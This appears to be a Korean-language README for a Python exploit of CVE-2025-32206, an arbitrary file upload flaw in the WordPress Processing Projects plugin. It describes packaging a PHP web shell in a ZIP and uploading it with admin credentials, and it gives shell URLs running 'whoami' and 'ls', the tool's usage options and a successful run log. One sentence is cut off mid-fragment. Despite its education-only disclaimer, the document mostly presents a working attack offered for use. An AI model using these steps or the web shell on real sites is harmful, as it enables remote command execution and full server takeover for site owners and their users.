
WordPress Processing Projects 플러그인 <= 1.0.2는 임의 파일 업로드 취약점에 취약합니다.
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"LABCAT Processing Projects의 위험한 유형의 파일 무제한 업로드 취약점으로 인해 공격자가 웹 서버에 웹 셸을 업로드할 수 있습니다. 이로 인해 완전한 손상이 발생할 수 있습니다."
이 Python 익스플로잇 스크립트는 취약한 Processing Projects 플러그인(버전 <= 1.0.2)을 사용하는 WordPress 사이트를 대상으로 합니다. 이 플러그인은 인증된 사용자의 파일 업로드를 부적절하게 처리하여 실행 가능한 PHP 코드(웹 셸)가 포함된 임의의 ZIP 파일을 업로드할 수 있도록 합니다.
익스플로잇 스크립트:
Nxploit.php)이 포함된 ZIP 파일(Nxploited.zip)을 생성합니다.http://target.com/wp-content/uploads/processing-projects/Nxploit.php셸이 성공적으로 업로드되면 cmd 매개변수를 통해 시스템 명령을 실행하는 데 사용할 수 있습니다. 예시:
http://target.com/wp-content/uploads/processing-projects/Nxploit.php?cmd=whoami
http://target.com/wp-content/uploads/processing-projects/Nxploit.php?cmd=ls
이 셸은 임의의 OS 명령을 실행하고 그 출력을 응답에 직접 반환합니다.
usage: CVE-2025-32206.py [-h] -u URL -un USERNAME -p PASSWORD
Exploit for CVE-2025-32206 | By Nxploited (Khaled Alenazi)
options:
-h, --help show this help message and exit
-u, --url URL Target WordPress URL (e.g. http://target.com/wordpress)
-un, --username USERNAME WordPress admin username
-p, --password PASSWORD WordPress admin password
[+] CVE-2025-32206 | WordPress Processing Projects <= 1.0.2 - Arbitrary File Upload
[+] By Nxploited | Khaled Alenazi
[+] Created zip with shell: Nxploited.zip -> Nxploit.php
[+] Logged in successfully.
[+] Extracted form fields successfully.
[+] Upload request sent successfully.
[+] Shell executed at: http://target.com/wp-content/uploads/processing-projects/Nxploit.php
이 스크립트는 교육 목적으로만 제공됩니다. 소유하지 않거나 명시적 테스트 권한이 없는 시스템에서 이 익스플로잇을 무단으로 사용하는 것은 불법이며 비윤리적입니다.
항상 책임 있는 공개 관행을 따르고 통제된 환경이나 명시적 승인을 받은 경우에만 이 도구를 사용하십시오.
제작: Nxploited | Khaled Alenazi